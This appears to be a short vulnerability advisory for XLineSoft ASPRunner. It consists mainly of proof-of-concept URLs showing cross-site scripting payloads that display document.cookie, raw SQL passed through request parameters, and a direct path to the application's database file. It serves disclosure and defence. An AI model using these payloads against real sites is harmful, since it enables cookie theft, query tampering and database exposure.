|
XLineSoft ASPRunner Multiple Vulnerabilities
No exploit is required. The following proof of concept examples are available: http://www.example.com/[TABLE-NAME]_search.asp?action=AdvancedSearch&FieldName=word _id&NeedQuoteswordid=False%2C+False&Typewordid=3%2C+3&SearchOption=Contains& SearchFor=&FieldName=tr&NeedQuotestr=True&Typetr=202&SearchOption=Contains&S earchFor=&FieldName=en&NeedQuotesen=True&Typeen=202&SearchOption=Contains&Se archFor=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&FieldNam e=desc&NeedQuotesdesc=True&Typedesc=203&SearchOption=Contains&SearchFor= http://www.example.com/[TABLE-NAME]_edit.asp?editid=2822&editid2=&editid3=&TargetPa geNumber=1&SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ese lect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben%5D%2C+++%5Bdesc %5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&NeedQuoteswordid=False&Ne edQuotes=&NeedQuotes=&action=view http://www.example.com/[TABLE-NAME]_list.asp?TargetPageNumber=1&sourceID=&cmdGotoPa ge=&action=Search&SQL=select+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C +++%5Ben%5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++where+1%3D0+or+%5Btr%5D+ like+%27%25&orderby=+order+by+%5Ben%5D+desc&PageSize=20&SearchField=AnyField &SearchOption=Contains&SearchFor=%22%3E%3Cscript%3Ealert%28document.cookie%2 9%3C%2Fscript%3E&PageSizeSelect=20&NeedQuoteswordid=False&Typewordid=3&NeedQ uoteswordid=False&Typewordid=3&NeedQuotestr=True&Typetr=202&NeedQuotesen=Tru e&Typeen=202&NeedQuotesdesc=True&Typedesc=203 http://www.example.com/export.asp?SQL=%22%3E%3Cscript%3Ealert%28document.cookie%29% 3C%2Fscript%3Eselect+%5Bword_id%5D%2C+%5Bword_id%5D%2C+++%5Btr%5D%2C+++%5Ben %5D%2C+++%5Bdesc%5D++From+%5Bdictionary%5D++order+by+%5Ben%5D+desc&mypage=1& pagesize=20 http://www.example.com/db/[DB-FILE-NAME] |
|
|
Privacy Statement |
